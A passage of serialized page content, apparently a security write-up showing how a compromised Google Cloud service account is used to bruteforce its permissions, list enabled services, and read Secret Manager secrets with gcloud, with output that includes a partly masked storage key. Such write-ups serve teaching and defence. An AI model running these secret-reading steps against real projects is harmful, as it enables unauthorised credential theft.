resourcemanager.projects=get\n",{"type":32,"tag":127,"props":3432,"children":3433},{"class":129,"line":1050},[3434,3438,3442,3446,3450,3454],{"type":32,"tag":127,"props":3435,"children":3436},{"style":134},[3437],{"type":37,"value":519},{"type":32,"tag":127,"props":3439,"children":3440},{"style":522},[3441],{"type":37,"value":525},{"type":32,"tag":127,"props":3443,"children":3444},{"style":139},[3445],{"type":37,"value":3417},{"type":32,"tag":127,"props":3447,"children":3448},{"style":139},[3449],{"type":37,"value":576},{"type":32,"tag":127,"props":3451,"children":3452},{"style":139},[3453],{"type":37,"value":540},{"type":32,"tag":127,"props":3455,"children":3456},{"style":139},[3457],{"type":37,"value":3458}," secretmanager.secrets=get\n",{"type":32,"tag":127,"props":3460,"children":3461},{"class":129,"line":1062},[3462,3466,3470,3474,3478,3482],{"type":32,"tag":127,"props":3463,"children":3464},{"style":134},[3465],{"type":37,"value":519},{"type":32,"tag":127,"props":3467,"children":3468},{"style":522},[3469],{"type":37,"value":525},{"type":32,"tag":127,"props":3471,"children":3472},{"style":139},[3473],{"type":37,"value":3417},{"type":32,"tag":127,"props":3475,"children":3476},{"style":139},[3477],{"type":37,"value":576},{"type":32,"tag":127,"props":3479,"children":3480},{"style":139},[3481],{"type":37,"value":540},{"type":32,"tag":127,"props":3483,"children":3484},{"style":139},[3485],{"type":37,"value":3486}," secretmanager.secrets=get-iam-policy\n",{"type":32,"tag":127,"props":3488,"children":3489},{"class":129,"line":1075},[3490,3494,3498,3502,3506,3510],{"type":32,"tag":127,"props":3491,"children":3492},{"style":134},[3493],{"type":37,"value":519},{"type":32,"tag":127,"props":3495,"children":3496},{"style":522},[3497],{"type":37,"value":525},{"type":32,"tag":127,"props":3499,"children":3500},{"style":139},[3501],{"type":37,"value":3417},{"type":32,"tag":127,"props":3503,"children":3504},{"style":139},[3505],{"type":37,"value":576},{"type":32,"tag":127,"props":3507,"children":3508},{"style":139},[3509],{"type":37,"value":540},{"type":32,"tag":127,"props":3511,"children":3512},{"style":139},[3513],{"type":37,"value":3514}," secretmanager.secrets=list\n",{"type":32,"tag":127,"props":3516,"children":3517},{"class":129,"line":1088},[3518,3522,3526,3531,3535,3539],{"type":32,"tag":127,"props":3519,"children":3520},{"style":134},[3521],{"type":37,"value":519},{"type":32,"tag":127,"props":3523,"children":3524},{"style":522},[3525],{"type":37,"value":525},{"type":32,"tag":127,"props":3527,"children":3528},{"style":139},[3529],{"type":37,"value":3530}," 00:38:57",{"type":32,"tag":127,"props":3532,"children":3533},{"style":139},[3534],{"type":37,"value":576},{"type":32,"tag":127,"props":3536,"children":3537},{"style":139},[3538],{"type":37,"value":540},{"type":32,"tag":127,"props":3540,"children":3541},{"style":139},[3542],{"type":37,"value":3543}," run.routes=invoke\n",{"type":32,"tag":127,"props":3545,"children":3546},{"class":129,"line":1100},[3547,3551,3555,3559,3563,3567],{"type":32,"tag":127,"props":3548,"children":3549},{"style":134},[3550],{"type":37,"value":519},{"type":32,"tag":127,"props":3552,"children":3553},{"style":522},[3554],{"type":37,"value":525},{"type":32,"tag":127,"props":3556,"children":3557},{"style":139},[3558],{"type":37,"value":3530},{"type":32,"tag":127,"props":3560,"children":3561},{"style":139},[3562],{"type":37,"value":576},{"type":32,"tag":127,"props":3564,"children":3565},{"style":139},[3566],{"type":37,"value":540},{"type":32,"tag":127,"props":3568,"children":3569},{"style":139},[3570],{"type":37,"value":3571}," serviceusage.quotas=get\n",{"type":32,"tag":127,"props":3573,"children":3574},{"class":129,"line":1113},[3575,3579,3583,3587,3591,3595],{"type":32,"tag":127,"props":3576,"children":3577},{"style":134},[3578],{"type":37,"value":519},{"type":32,"tag":127,"props":3580,"children":3581},{"style":522},[3582],{"type":37,"value":525},{"type":32,"tag":127,"props":3584,"children":3585},{"style":139},[3586],{"type":37,"value":3530},{"type":32,"tag":127,"props":3588,"children":3589},{"style":139},[3590],{"type":37,"value":576},{"type":32,"tag":127,"props":3592,"children":3593},{"style":139},[3594],{"type":37,"value":540},{"type":32,"tag":127,"props":3596,"children":3597},{"style":139},[3598],{"type":37,"value":3599}," serviceusage.services=get\n",{"type":32,"tag":127,"props":3601,"children":3602},{"class":129,"line":1126},[3603,3607,3611,3615,3619,3623],{"type":32,"tag":127,"props":3604,"children":3605},{"style":134},[3606],{"type":37,"value":519},{"type":32,"tag":127,"props":3608,"children":3609},{"style":522},[3610],{"type":37,"value":525},{"type":32,"tag":127,"props":3612,"children":3613},{"style":139},[3614],{"type":37,"value":3530},{"type":32,"tag":127,"props":3616,"children":3617},{"style":139},[3618],{"type":37,"value":576},{"type":32,"tag":127,"props":3620,"children":3621},{"style":139},[3622],{"type":37,"value":540},{"type":32,"tag":127,"props":3624,"children":3625},{"style":139},[3626],{"type":37,"value":3627}," serviceusage.services=list\n",{"type":32,"tag":46,"props":3629,"children":3630},{},[3631],{"type":37,"value":3632},"When we try to bruteforce the permissions of the new service account, we can see that many permissions are allocated to the compute service, but we can quickly see that it is not activated on the GCP organization.",{"type":32,"tag":113,"props":3634,"children":3635},{"lang":115},[3636],{"type":32,"tag":118,"props":3637,"children":3639},{"className":120,"code":3638,"language":115,"meta":7,"style":7},"$> gcloud compute networks list --project=$GCP_PROJ\nAPI [compute.googleapis.com] not enabled on project [gr-proj-4]. Would you like to enable and retry (this will take a few minutes)? (y/N)?\n\n$> gcloud services list\nNAME                                 TITLE\nanalyticshub.googleapis.com          Analytics Hub API\nbigquery.googleapis.com              BigQuery API\nbigqueryconnection.googleapis.com    BigQuery Connection API\nbigquerydatapolicy.googleapis.com    BigQuery Data Policy API\nbigquerymigration.googleapis.com     BigQuery Migration API\nbigqueryreservation.googleapis.com   BigQuery Reservation API\nbigquerystorage.googleapis.com       BigQuery Storage API\ncloudapis.googleapis.com             Google Cloud APIs\ncloudresourcemanager.googleapis.com  Cloud Resource Manager API\ncloudtrace.googleapis.com            Cloud Trace API\ndataform.googleapis.com              Dataform API\ndataplex.googleapis.com              Cloud Dataplex API\ndatastore.googleapis.com             Cloud Datastore API\niam.googleapis.com                   Identity and Access Management (IAM) API\niamcredentials.googleapis.com        IAM Service Account Credentials API\nlogging.googleapis.com               Cloud Logging API\nmonitoring.googleapis.com            Cloud Monitoring API\nsecretmanager.googleapis.com         Secret Manager API\nservicemanagement.googleapis.com     Service Management API\nserviceusage.googleapis.com          Service Usage API\nsql-component.googleapis.com         Cloud SQL\nstorage-api.googleapis.com           Google Cloud Storage JSON API\nstorage-component.googleapis.com     Cloud Storage\nstorage.googleapis.com               Cloud Storage API\n",[3640],{"type":32,"tag":104,"props":3641,"children":3642},{"__ignoreMap":7},[3643,3685,3773,3780,3805,3818,3841,3858,3880,3906,3928,3950,3972,3995,4022,4044,4061,4083,4105,4138,4170,4192,4213,4234,4255,4277,4295,4325,4343],{"type":32,"tag":127,"props":3644,"children":3645},{"class":129,"line":130},[3646,3651,3656,3660,3665,3670,3675,3680],{"type":32,"tag":127,"props":3647,"children":3648},{"style":134},[3649],{"type":37,"value":3650},"$",{"type":32,"tag":127,"props":3652,"children":3653},{"style":322},[3654],{"type":37,"value":3655},"> ",{"type":32,"tag":127,"props":3657,"children":3658},{"style":139},[3659],{"type":37,"value":109},{"type":32,"tag":127,"props":3661,"children":3662},{"style":139},[3663],{"type":37,"value":3664}," compute",{"type":32,"tag":127,"props":3666,"children":3667},{"style":139},[3668],{"type":37,"value":3669}," networks",{"type":32,"tag":127,"props":3671,"children":3672},{"style":139},[3673],{"type":37,"value":3674}," list",{"type":32,"tag":127,"props":3676,"children":3677},{"style":150},[3678],{"type":37,"value":3679}," --project=",{"type":32,"tag":127,"props":3681,"children":3682},{"style":139},[3683],{"type":37,"value":3684},"$GCP_PROJ\n",{"type":32,"tag":127,"props":3686,"children":3687},{"class":129,"line":361},[3688,3693,3698,3702,3707,3711,3716,3721,3726,3731,3736,3741,3746,3750,3755,3759,3764,3768],{"type":32,"tag":127,"props":3689,"children":3690},{"style":134},[3691],{"type":37,"value":3692},"API",{"type":32,"tag":127,"props":3694,"children":3695},{"style":322},[3696],{"type":37,"value":3697}," [compute.googleapis.com] not enabled on project ",{"type":32,"tag":127,"props":3699,"children":3700},{"style":311},[3701],{"type":37,"value":343},{"type":32,"tag":127,"props":3703,"children":3704},{"style":322},[3705],{"type":37,"value":3706},"gr-proj-4",{"type":32,"tag":127,"props":3708,"children":3709},{"style":311},[3710],{"type":37,"value":353},{"type":32,"tag":127,"props":3712,"children":3713},{"style":322},[3714],{"type":37,"value":3715},". Would you like to enable and retry (",{"type":32,"tag":127,"props":3717,"children":3718},{"style":134},[3719],{"type":37,"value":3720},"this",{"type":32,"tag":127,"props":3722,"children":3723},{"style":139},[3724],{"type":37,"value":3725}," will",{"type":32,"tag":127,"props":3727,"children":3728},{"style":139},[3729],{"type":37,"value":3730}," take",{"type":32,"tag":127,"props":3732,"children":3733},{"style":139},[3734],{"type":37,"value":3735}," a",{"type":32,"tag":127,"props":3737,"children":3738},{"style":139},[3739],{"type":37,"value":3740}," few",{"type":32,"tag":127,"props":3742,"children":3743},{"style":139},[3744],{"type":37,"value":3745}," minutes",{"type":32,"tag":127,"props":3747,"children":3748},{"style":322},[3749],{"type":37,"value":2965},{"type":32,"tag":127,"props":3751,"children":3752},{"style":299},[3753],{"type":37,"value":3754},"?",{"type":32,"tag":127,"props":3756,"children":3757},{"style":322},[3758],{"type":37,"value":2851},{"type":32,"tag":127,"props":3760,"children":3761},{"style":134},[3762],{"type":37,"value":3763},"y/N",{"type":32,"tag":127,"props":3765,"children":3766},{"style":322},[3767],{"type":37,"value":2965},{"type":32,"tag":127,"props":3769,"children":3770},{"style":299},[3771],{"type":37,"value":3772},"?\n",{"type":32,"tag":127,"props":3774,"children":3775},{"class":129,"line":402},[3776],{"type":32,"tag":127,"props":3777,"children":3778},{"emptyLinePlaceholder":895},[3779],{"type":37,"value":898},{"type":32,"tag":127,"props":3781,"children":3782},{"class":129,"line":738},[3783,3787,3791,3795,3800],{"type":32,"tag":127,"props":3784,"children":3785},{"style":134},[3786],{"type":37,"value":3650},{"type":32,"tag":127,"props":3788,"children":3789},{"style":322},[3790],{"type":37,"value":3655},{"type":32,"tag":127,"props":3792,"children":3793},{"style":139},[3794],{"type":37,"value":109},{"type":32,"tag":127,"props":3796,"children":3797},{"style":139},[3798],{"type":37,"value":3799}," services",{"type":32,"tag":127,"props":3801,"children":3802},{"style":139},[3803],{"type":37,"value":3804}," list\n",{"type":32,"tag":127,"props":3806,"children":3807},{"class":129,"line":764},[3808,3813],{"type":32,"tag":127,"props":3809,"children":3810},{"style":134},[3811],{"type":37,"value":3812},"NAME",{"type":32,"tag":127,"props":3814,"children":3815},{"style":139},[3816],{"type":37,"value":3817},"                                 TITLE\n",{"type":32,"tag":127,"props":3819,"children":3820},{"class":129,"line":803},[3821,3826,3831,3836],{"type":32,"tag":127,"props":3822,"children":3823},{"style":134},[3824],{"type":37,"value":3825},"analyticshub.googleapis.com",{"type":32,"tag":127,"props":3827,"children":3828},{"style":139},[3829],{"type":37,"value":3830},"          Analytics",{"type":32,"tag":127,"props":3832,"children":3833},{"style":139},[3834],{"type":37,"value":3835}," Hub",{"type":32,"tag":127,"props":3837,"children":3838},{"style":139},[3839],{"type":37,"value":3840}," API\n",{"type":32,"tag":127,"props":3842,"children":3843},{"class":129,"line":838},[3844,3849,3854],{"type":32,"tag":127,"props":3845,"children":3846},{"style":134},[3847],{"type":37,"value":3848},"bigquery.googleapis.com",{"type":32,"tag":127,"props":3850,"children":3851},{"style":139},[3852],{"type":37,"value":3853},"              BigQuery",{"type":32,"tag":127,"props":3855,"children":3856},{"style":139},[3857],{"type":37,"value":3840},{"type":32,"tag":127,"props":3859,"children":3860},{"class":129,"line":847},[3861,3866,3871,3876],{"type":32,"tag":127,"props":3862,"children":3863},{"style":134},[3864],{"type":37,"value":3865},"bigqueryconnection.googleapis.com",{"type":32,"tag":127,"props":3867,"children":3868},{"style":139},[3869],{"type":37,"value":3870},"    BigQuery",{"type":32,"tag":127,"props":3872,"children":3873},{"style":139},[3874],{"type":37,"value":3875}," Connection",{"type":32,"tag":127,"props":3877,"children":3878},{"style":139},[3879],{"type":37,"value":3840},{"type":32,"tag":127,"props":3881,"children":3882},{"class":129,"line":975},[3883,3888,3892,3897,3902],{"type":32,"tag":127,"props":3884,"children":3885},{"style":134},[3886],{"type":37,"value":3887},"bigquerydatapolicy.googleapis.com",{"type":32,"tag":127,"props":3889,"children":3890},{"style":139},[3891],{"type":37,"value":3870},{"type":32,"tag":127,"props":3893,"children":3894},{"style":139},[3895],{"type":37,"value":3896}," Data",{"type":32,"tag":127,"props":3898,"children":3899},{"style":139},[3900],{"type":37,"value":3901}," Policy",{"type":32,"tag":127,"props":3903,"children":3904},{"style":139},[3905],{"type":37,"value":3840},{"type":32,"tag":127,"props":3907,"children":3908},{"class":129,"line":987},[3909,3914,3919,3924],{"type":32,"tag":127,"props":3910,"children":3911},{"style":134},[3912],{"type":37,"value":3913},"bigquerymigration.googleapis.com",{"type":32,"tag":127,"props":3915,"children":3916},{"style":139},[3917],{"type":37,"value":3918},"     BigQuery",{"type":32,"tag":127,"props":3920,"children":3921},{"style":139},[3922],{"type":37,"value":3923}," Migration",{"type":32,"tag":127,"props":3925,"children":3926},{"style":139},[3927],{"type":37,"value":3840},{"type":32,"tag":127,"props":3929,"children":3930},{"class":129,"line":1000},[3931,3936,3941,3946],{"type":32,"tag":127,"props":3932,"children":3933},{"style":134},[3934],{"type":37,"value":3935},"bigqueryreservation.googleapis.com",{"type":32,"tag":127,"props":3937,"children":3938},{"style":139},[3939],{"type":37,"value":3940},"   BigQuery",{"type":32,"tag":127,"props":3942,"children":3943},{"style":139},[3944],{"type":37,"value":3945}," Reservation",{"type":32,"tag":127,"props":3947,"children":3948},{"style":139},[3949],{"type":37,"value":3840},{"type":32,"tag":127,"props":3951,"children":3952},{"class":129,"line":1013},[3953,3958,3963,3968],{"type":32,"tag":127,"props":3954,"children":3955},{"style":134},[3956],{"type":37,"value":3957},"bigquerystorage.googleapis.com",{"type":32,"tag":127,"props":3959,"children":3960},{"style":139},[3961],{"type":37,"value":3962},"       BigQuery",{"type":32,"tag":127,"props":3964,"children":3965},{"style":139},[3966],{"type":37,"value":3967}," Storage",{"type":32,"tag":127,"props":3969,"children":3970},{"style":139},[3971],{"type":37,"value":3840},{"type":32,"tag":127,"props":3973,"children":3974},{"class":129,"line":1025},[3975,3980,3985,3990],{"type":32,"tag":127,"props":3976,"children":3977},{"style":134},[3978],{"type":37,"value":3979},"cloudapis.googleapis.com",{"type":32,"tag":127,"props":3981,"children":3982},{"style":139},[3983],{"type":37,"value":3984},"             Google",{"type":32,"tag":127,"props":3986,"children":3987},{"style":139},[3988],{"type":37,"value":3989}," Cloud",{"type":32,"tag":127,"props":3991,"children":3992},{"style":139},[3993],{"type":37,"value":3994}," APIs\n",{"type":32,"tag":127,"props":3996,"children":3997},{"class":129,"line":1037},[3998,4003,4008,4013,4018],{"type":32,"tag":127,"props":3999,"children":4000},{"style":134},[4001],{"type":37,"value":4002},"cloudresourcemanager.googleapis.com",{"type":32,"tag":127,"props":4004,"children":4005},{"style":139},[4006],{"type":37,"value":4007},"  Cloud",{"type":32,"tag":127,"props":4009,"children":4010},{"style":139},[4011],{"type":37,"value":4012}," Resource",{"type":32,"tag":127,"props":4014,"children":4015},{"style":139},[4016],{"type":37,"value":4017}," Manager",{"type":32,"tag":127,"props":4019,"children":4020},{"style":139},[4021],{"type":37,"value":3840},{"type":32,"tag":127,"props":4023,"children":4024},{"class":129,"line":1050},[4025,4030,4035,4040],{"type":32,"tag":127,"props":4026,"children":4027},{"style":134},[4028],{"type":37,"value":4029},"cloudtrace.googleapis.com",{"type":32,"tag":127,"props":4031,"children":4032},{"style":139},[4033],{"type":37,"value":4034},"            Cloud",{"type":32,"tag":127,"props":4036,"children":4037},{"style":139},[4038],{"type":37,"value":4039}," Trace",{"type":32,"tag":127,"props":4041,"children":4042},{"style":139},[4043],{"type":37,"value":3840},{"type":32,"tag":127,"props":4045,"children":4046},{"class":129,"line":1062},[4047,4052,4057],{"type":32,"tag":127,"props":4048,"children":4049},{"style":134},[4050],{"type":37,"value":4051},"dataform.googleapis.com",{"type":32,"tag":127,"props":4053,"children":4054},{"style":139},[4055],{"type":37,"value":4056},"              Dataform",{"type":32,"tag":127,"props":4058,"children":4059},{"style":139},[4060],{"type":37,"value":3840},{"type":32,"tag":127,"props":4062,"children":4063},{"class":129,"line":1075},[4064,4069,4074,4079],{"type":32,"tag":127,"props":4065,"children":4066},{"style":134},[4067],{"type":37,"value":4068},"dataplex.googleapis.com",{"type":32,"tag":127,"props":4070,"children":4071},{"style":139},[4072],{"type":37,"value":4073},"              Cloud",{"type":32,"tag":127,"props":4075,"children":4076},{"style":139},[4077],{"type":37,"value":4078}," Dataplex",{"type":32,"tag":127,"props":4080,"children":4081},{"style":139},[4082],{"type":37,"value":3840},{"type":32,"tag":127,"props":4084,"children":4085},{"class":129,"line":1088},[4086,4091,4096,4101],{"type":32,"tag":127,"props":4087,"children":4088},{"style":134},[4089],{"type":37,"value":4090},"datastore.googleapis.com",{"type":32,"tag":127,"props":4092,"children":4093},{"style":139},[4094],{"type":37,"value":4095},"             Cloud",{"type":32,"tag":127,"props":4097,"children":4098},{"style":139},[4099],{"type":37,"value":4100}," Datastore",{"type":32,"tag":127,"props":4102,"children":4103},{"style":139},[4104],{"type":37,"value":3840},{"type":32,"tag":127,"props":4106,"children":4107},{"class":129,"line":1100},[4108,4113,4118,4123,4128,4133],{"type":32,"tag":127,"props":4109,"children":4110},{"style":134},[4111],{"type":37,"value":4112},"iam.googleapis.com",{"type":32,"tag":127,"props":4114,"children":4115},{"style":139},[4116],{"type":37,"value":4117},"                   Identity",{"type":32,"tag":127,"props":4119,"children":4120},{"style":139},[4121],{"type":37,"value":4122}," and",{"type":32,"tag":127,"props":4124,"children":4125},{"style":139},[4126],{"type":37,"value":4127}," Access",{"type":32,"tag":127,"props":4129,"children":4130},{"style":139},[4131],{"type":37,"value":4132}," Management",{"type":32,"tag":127,"props":4134,"children":4135},{"style":322},[4136],{"type":37,"value":4137}," (IAM) API\n",{"type":32,"tag":127,"props":4139,"children":4140},{"class":129,"line":1113},[4141,4146,4151,4156,4161,4166],{"type":32,"tag":127,"props":4142,"children":4143},{"style":134},[4144],{"type":37,"value":4145},"iamcredentials.googleapis.com",{"type":32,"tag":127,"props":4147,"children":4148},{"style":139},[4149],{"type":37,"value":4150},"        IAM",{"type":32,"tag":127,"props":4152,"children":4153},{"style":139},[4154],{"type":37,"value":4155}," Service",{"type":32,"tag":127,"props":4157,"children":4158},{"style":139},[4159],{"type":37,"value":4160}," Account",{"type":32,"tag":127,"props":4162,"children":4163},{"style":139},[4164],{"type":37,"value":4165}," Credentials",{"type":32,"tag":127,"props":4167,"children":4168},{"style":139},[4169],{"type":37,"value":3840},{"type":32,"tag":127,"props":4171,"children":4172},{"class":129,"line":1126},[4173,4178,4183,4188],{"type":32,"tag":127,"props":4174,"children":4175},{"style":134},[4176],{"type":37,"value":4177},"logging.googleapis.com",{"type":32,"tag":127,"props":4179,"children":4180},{"style":139},[4181],{"type":37,"value":4182},"               Cloud",{"type":32,"tag":127,"props":4184,"children":4185},{"style":139},[4186],{"type":37,"value":4187}," Logging",{"type":32,"tag":127,"props":4189,"children":4190},{"style":139},[4191],{"type":37,"value":3840},{"type":32,"tag":127,"props":4193,"children":4194},{"class":129,"line":1138},[4195,4200,4204,4209],{"type":32,"tag":127,"props":4196,"children":4197},{"style":134},[4198],{"type":37,"value":4199},"monitoring.googleapis.com",{"type":32,"tag":127,"props":4201,"children":4202},{"style":139},[4203],{"type":37,"value":4034},{"type":32,"tag":127,"props":4205,"children":4206},{"style":139},[4207],{"type":37,"value":4208}," Monitoring",{"type":32,"tag":127,"props":4210,"children":4211},{"style":139},[4212],{"type":37,"value":3840},{"type":32,"tag":127,"props":4214,"children":4215},{"class":129,"line":1151},[4216,4221,4226,4230],{"type":32,"tag":127,"props":4217,"children":4218},{"style":134},[4219],{"type":37,"value":4220},"secretmanager.googleapis.com",{"type":32,"tag":127,"props":4222,"children":4223},{"style":139},[4224],{"type":37,"value":4225},"         Secret",{"type":32,"tag":127,"props":4227,"children":4228},{"style":139},[4229],{"type":37,"value":4017},{"type":32,"tag":127,"props":4231,"children":4232},{"style":139},[4233],{"type":37,"value":3840},{"type":32,"tag":127,"props":4235,"children":4236},{"class":129,"line":1164},[4237,4242,4247,4251],{"type":32,"tag":127,"props":4238,"children":4239},{"style":134},[4240],{"type":37,"value":4241},"servicemanagement.googleapis.com",{"type":32,"tag":127,"props":4243,"children":4244},{"style":139},[4245],{"type":37,"value":4246},"     Service",{"type":32,"tag":127,"props":4248,"children":4249},{"style":139},[4250],{"type":37,"value":4132},{"type":32,"tag":127,"props":4252,"children":4253},{"style":139},[4254],{"type":37,"value":3840},{"type":32,"tag":127,"props":4256,"children":4257},{"class":129,"line":1176},[4258,4263,4268,4273],{"type":32,"tag":127,"props":4259,"children":4260},{"style":134},[4261],{"type":37,"value":4262},"serviceusage.googleapis.com",{"type":32,"tag":127,"props":4264,"children":4265},{"style":139},[4266],{"type":37,"value":4267},"          Service",{"type":32,"tag":127,"props":4269,"children":4270},{"style":139},[4271],{"type":37,"value":4272}," Usage",{"type":32,"tag":127,"props":4274,"children":4275},{"style":139},[4276],{"type":37,"value":3840},{"type":32,"tag":127,"props":4278,"children":4279},{"class":129,"line":1188},[4280,4285,4290],{"type":32,"tag":127,"props":4281,"children":4282},{"style":134},[4283],{"type":37,"value":4284},"sql-component.googleapis.com",{"type":32,"tag":127,"props":4286,"children":4287},{"style":139},[4288],{"type":37,"value":4289},"         Cloud",{"type":32,"tag":127,"props":4291,"children":4292},{"style":139},[4293],{"type":37,"value":4294}," SQL\n",{"type":32,"tag":127,"props":4296,"children":4297},{"class":129,"line":1201},[4298,4303,4308,4312,4316,4321],{"type":32,"tag":127,"props":4299,"children":4300},{"style":134},[4301],{"type":37,"value":4302},"storage-api.googleapis.com",{"type":32,"tag":127,"props":4304,"children":4305},{"style":139},[4306],{"type":37,"value":4307},"           Google",{"type":32,"tag":127,"props":4309,"children":4310},{"style":139},[4311],{"type":37,"value":3989},{"type":32,"tag":127,"props":4313,"children":4314},{"style":139},[4315],{"type":37,"value":3967},{"type":32,"tag":127,"props":4317,"children":4318},{"style":139},[4319],{"type":37,"value":4320}," JSON",{"type":32,"tag":127,"props":4322,"children":4323},{"style":139},[4324],{"type":37,"value":3840},{"type":32,"tag":127,"props":4326,"children":4327},{"class":129,"line":1213},[4328,4333,4338],{"type":32,"tag":127,"props":4329,"children":4330},{"style":134},[4331],{"type":37,"value":4332},"storage-component.googleapis.com",{"type":32,"tag":127,"props":4334,"children":4335},{"style":139},[4336],{"type":37,"value":4337},"     Cloud",{"type":32,"tag":127,"props":4339,"children":4340},{"style":139},[4341],{"type":37,"value":4342}," Storage\n",{"type":32,"tag":127,"props":4344,"children":4345},{"class":129,"line":1225},[4346,4351,4355,4359],{"type":32,"tag":127,"props":4347,"children":4348},{"style":134},[4349],{"type":37,"value":4350},"storage.googleapis.com",{"type":32,"tag":127,"props":4352,"children":4353},{"style":139},[4354],{"type":37,"value":4182},{"type":32,"tag":127,"props":4356,"children":4357},{"style":139},[4358],{"type":37,"value":3967},{"type":32,"tag":127,"props":4360,"children":4361},{"style":139},[4362],{"type":37,"value":3840},{"type":32,"tag":46,"props":4364,"children":4365},{},[4366],{"type":37,"value":4367},"We can also see that we have rights on the secrets that we can enumerate with the following command:",{"type":32,"tag":113,"props":4369,"children":4370},{"lang":115},[4371],{"type":32,"tag":118,"props":4372,"children":4374},{"className":120,"code":4373,"language":115,"meta":7,"style":7},"$> gcloud secrets list --project=$GCP_PROJ\nNAME              CREATED              REPLICATION_POLICY  LOCATIONS\npayments          2025-04-02T14:36:59  automatic           -\npayments-storage  2025-04-02T16:25:57  automatic           -\n\n$> gcloud secrets versions access latest --secret=payments-storage  --project=$GCP_PROJ\ngr-stripe\n\n$> gcloud secrets versions access latest --secret=payments  --project=$GCP_PROJ\nGOOG1E6CZ32****************************************\nHh**************************************\n",[4375],{"type":32,"tag":104,"props":4376,"children":4377},{"__ignoreMap":7},[4378,4410,4432,4455,4476,4483,4531,4539,4546,4590,4598],{"type":32,"tag":127,"props":4379,"children":4380},{"class":129,"line":130},[4381,4385,4389,4393,4398,4402,4406],{"type":32,"tag":127,"props":4382,"children":4383},{"style":134},[4384],{"type":37,"value":3650},{"type":32,"tag":127,"props":4386,"children":4387},{"style":322},[4388],{"type":37,"value":3655},{"type":32,"tag":127,"props":4390,"children":4391},{"style":139},[4392],{"type":37,"value":109},{"type":32,"tag":127,"props":4394,"children":4395},{"style":139},[4396],{"type":37,"value":4397}," secrets",{"type":32,"tag":127,"props":4399,"children":4400},{"style":139},[4401],{"type":37,"value":3674},{"type":32,"tag":127,"props":4403,"children":4404},{"style":150},[4405],{"type":37,"value":3679},{"type":32,"tag":127,"props":4407,"children":4408},{"style":139},[4409],{"type":37,"value":3684},{"type":32,"tag":127,"props":4411,"children":4412},{"class":129,"line":361},[4413,4417,4422,4427],{"type":32,"tag":127,"props":4414,"children":4415},{"style":134},[4416],{"type":37,"value":3812},{"type":32,"tag":127,"props":4418,"children":4419},{"style":139},[4420],{"type":37,"value":4421},"              CREATED",{"type":32,"tag":127,"props":4423,"children":4424},{"style":139},[4425],{"type":37,"value":4426},"              REPLICATION_POLICY",{"type":32,"tag":127,"props":4428,"children":4429},{"style":139},[4430],{"type":37,"value":4431},"  LOCATIONS\n",{"type":32,"tag":127,"props":4433,"children":4434},{"class":129,"line":402},[4435,4440,4445,4450],{"type":32,"tag":127,"props":4436,"children":4437},{"style":134},[4438],{"type":37,"value":4439},"payments",{"type":32,"tag":127,"props":4441,"children":4442},{"style":139},[4443],{"type":37,"value":4444},"          2025-04-02T14:36:59",{"type":32,"tag":127,"props":4446,"children":4447},{"style":139},[4448],{"type":37,"value":4449},"  automatic",{"type":32,"tag":127,"props":4451,"children":4452},{"style":139},[4453],{"type":37,"value":4454},"           -\n",{"type":32,"tag":127,"props":4456,"children":4457},{"class":129,"line":738},[4458,4463,4468,4472],{"type":32,"tag":127,"props":4459,"children":4460},{"style":134},[4461],{"type":37,"value":4462},"payments-storage",{"type":32,"tag":127,"props":4464,"children":4465},{"style":139},[4466],{"type":37,"value":4467},"  2025-04-02T16:25:57",{"type":32,"tag":127,"props":4469,"children":4470},{"style":139},[4471],{"type":37,"value":4449},{"type":32,"tag":127,"props":4473,"children":4474},{"style":139},[4475],{"type":37,"value":4454},{"type":32,"tag":127,"props":4477,"children":4478},{"class":129,"line":764},[4479],{"type":32,"tag":127,"props":4480,"children":4481},{"emptyLinePlaceholder":895},[4482],{"type":37,"value":898},{"type":32,"tag":127,"props":4484,"children":4485},{"class":129,"line":803},[4486,4490,4494,4498,4502,4507,4512,4517,4522,4527],{"type":32,"tag":127,"props":4487,"children":4488},{"style":134},[4489],{"type":37,"value":3650},{"type":32,"tag":127,"props":4491,"children":4492},{"style":322},[4493],{"type":37,"value":3655},{"type":32,"tag":127,"props":4495,"children":4496},{"style":139},[4497],{"type":37,"value":109},{"type":32,"tag":127,"props":4499,"children":4500},{"style":139},[4501],{"type":37,"value":4397},{"type":32,"tag":127,"props":4503,"children":4504},{"style":139},[4505],{"type":37,"value":4506}," versions",{"type":32,"tag":127,"props":4508,"children":4509},{"style":139},[4510],{"type":37,"value":4511}," access",{"type":32,"tag":127,"props":4513,"children":4514},{"style":139},[4515],{"type":37,"value":4516}," latest",{"type":32,"tag":127,"props":4518,"children":4519},{"style":150},[4520],{"type":37,"value":4521}," --secret=payments-storage",{"type":32,"tag":127,"props":4523,"children":4524},{"style":150},[4525],{"type":37,"value":4526},"  --project=",{"type":32,"tag":127,"props":4528,"children":4529},{"style":139},[4530],{"type":37,"value":3684},{"type":32,"tag":127,"props":4532,"children":4533},{"class":129,"line":838},[4534],{"type":32,"tag":127,"props":4535,"children":4536},{"style":134},[4537],{"type":37,"value":4538},"gr-stripe\n",{"type":32,"tag":127,"props":4540,"children":4541},{"class":129,"line":847},[4542],{"type":32,"tag":127,"props":4543,"children":4544},{"emptyLinePlaceholder":895},[4545],{"type":37,"value":898},{"type":32,"tag":127,"props":4547,"children":4548},{"class":129,"line":975},[4549,4553,4557,4561,4565,4569,4573,4577,4582,4586],{"type":32,"tag":127,"props":4550,"children":4551},{"style":134},[4552],{"type":37,"value":3650},{"type":32,"tag":127,"props":4554,"children":4555},{"style":322},[4556],{"type":37,"value":3655},{"type":32,"tag":127,"props":4558,"children":4559},{"style":139},[4560],{"type":37,"value":109},{"type":32,"tag":127,"props":4562,"children":4563},{"style":139},[4564],{"type":37,"value":4397},{"type":32,"tag":127,"props":4566,"children":4567},{"style":139},[4568],{"type":37,"value":4506},{"type":32,"tag":127,"props":4570,"children":4571},{"style":139},[4572],{"type":37,"value":4511},{"type":32,"tag":127,"props":4574,"children":4575},{"style":139},[4576],{"type":37,"value":4516},{"type":32,"tag":127,"props":4578,"children":4579},{"style":150},[4580],{"type":37,"value":4581}," 